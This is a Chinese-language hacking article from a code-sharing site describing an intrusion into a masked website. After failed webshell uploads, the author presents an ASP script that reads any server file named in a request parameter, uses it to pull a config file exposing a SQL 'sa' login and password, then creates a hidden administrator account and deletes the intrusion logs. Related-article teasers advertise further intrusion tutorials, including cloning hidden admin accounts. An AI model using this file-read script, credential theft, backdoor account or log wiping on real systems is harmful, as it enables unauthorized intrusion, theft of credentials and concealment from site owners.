当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 黑客是如何突破一流检测系统的

黑客是如何突破一流检测系统的

2008年10月08日 脚本攻防 我要评论
黑客是如何突破一流检测系统的 攻击目标:www.***.com测试过的动作,一句话马,加密马,等。测试结果:无效,无法上传,无法进入系统。经过2天的分析,然后自己搞出了一个代码,利用此代码读取了该... 08-10-08
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%
file=request("file")
set fsoobj=server.createobject("scripting.filesystemobject")
if fsoobj.fileexists(file) then
set myfile=fsoobj.opentextfile(file,1)
response.write "<pre>" & server.htmlencode(myfile.readall) &"</pre>"
myfile.close
set myfile=nothing
else
response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=d:\wwwroot\index.asp 读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
(0)

相关文章:

  • 非主流入侵之会话劫持winnt/2k HASH

    非主流入侵之会话劫持winnt/2k HASH

    非主流入侵之会话劫持winnt/2k HASH 声明:本文只是在技术上分析如何来通过sniffer来劫持winnt/2k的hash,对此文可能造成的危害不负任... [阅读全文]
  • 热门技术探讨之跨站式入侵(图)

    热门技术探讨之跨站式入侵(图)

    热门技术探讨之跨站式入侵(图) 最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址 结果... [阅读全文]
  • 入侵网站实例

    入侵土耳其网站实例 打开SQL用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点,准备列目录。 构造注射点代码如…

    2008年10月08日 网络安全
  • 论坛通用入侵一条龙教学(图)

    论坛通用入侵一条龙教学(图)

    论坛通用入侵一条龙教学(图) 目前网上有种新的趋势,黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所,而许多用户的论坛密码竟然与E-mail和Q... [阅读全文]
  • MS07-029漏洞利用入侵过程

    MS07-029漏洞利用入侵过程 前言:MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前…

    2008年10月08日 网络安全
  • 手动克隆管理员

    手动克隆管理员

    手动克隆管理员 现在入侵一台主机容易但是保护好很难 所一我们讲一下手动克隆管理员帐号!~ c:>net user hacker$Content$nbsp... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com